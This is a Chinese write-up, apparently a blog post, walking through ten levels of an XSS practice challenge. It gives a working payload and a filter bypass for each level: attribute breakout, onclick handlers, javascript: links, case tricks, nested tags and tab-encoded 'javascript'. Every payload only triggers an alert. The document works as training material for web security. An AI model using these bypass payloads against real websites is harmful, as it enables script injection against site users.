XSS闯关挑战1-10

1

观察页面,发现页面没什么可利用的漏洞

但是url是?传参的类型,可以试试有没有xss漏洞

复制代码
<script>alert(/xss/)</script>

2

输入1的脚本发现没效果,看一下源代码,发现传入到value后是变成了字符串的形式,咱们就让他不是字符串

复制代码
<input name=keyword  value="  "><script>alert(/xss/)</script>"  ">

3

可以看到尖括号被过滤了

我们可以试试其他的可以弹出提示框的事件

复制代码
'  onclick='alert(/xss/)

还有以下常用事件

复制代码
mouseup  鼠标释放时触发
mousedown  鼠标按下时触发
mousemove   鼠标移动时触发
mouseout     鼠标离开时触发

4

过滤掉尖括号,以及用字符串

复制代码
"  onclick="alert(/xss/)

5

发现他过滤了事件,且大写也不行

我们可以用链接

复制代码
"> <a href = 'javascript:alert(/xss/)'>click me</a>"

6

用大写

复制代码
"> <a HREF = 'javascript:alert(/xss/)'>click me</a>"

7

过滤掉了href和script

复制代码
"><scrscriptipt>alert(/xss/)</scrscriptipt>"

8

想办法绕过

这里用制表符将script隔开

复制代码
javascr%09ipt:alert(/xss/)

9

提示连接不合法

在输入中输入url

复制代码
javascr%09ipt:alert('http://www.qq.com')

10

有三个input,试着传参

只有t_sort可以传参

发现输入事件无响应

试着加个按钮,成功了

复制代码
t_sort=dd" type="button" onclick="alert(/xss/)
相关推荐
数智化管理手记36 分钟前
智能财务如何减少财务加班?智能财务落地需要哪些工具支撑?
大数据·网络·数据库·数据挖掘·精益工程
味悲1 小时前
搭建WAF+宝塔反向代理
安全
摇滚侠1 小时前
Linux 零基础教程 09、11、77
linux·运维·服务器
Lottie20261 小时前
电商自动化提质增效:API接口落地的核心价值与实战用法
运维·自动化
BenSmith2 小时前
RTOS漏洞分析:CVE-2026-10641和CVE-2026-9263
安全
Hardworking6663 小时前
第6章 数据工程
运维·服务器·数据库·数据工程
Dola_Zou3 小时前
以CmASIC重塑AI+边缘设备的安全与商业复利
人工智能·安全·软件工程·软件加密
jieyucx3 小时前
Docker 入门第六阶段:综合实战项目
运维·docker·容器
美丽的欣情4 小时前
RK3588 Debian 交叉编译环境搭建(Windows + VMware Debian + CMake)
运维·windows·debian
小小小小钰儿4 小时前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程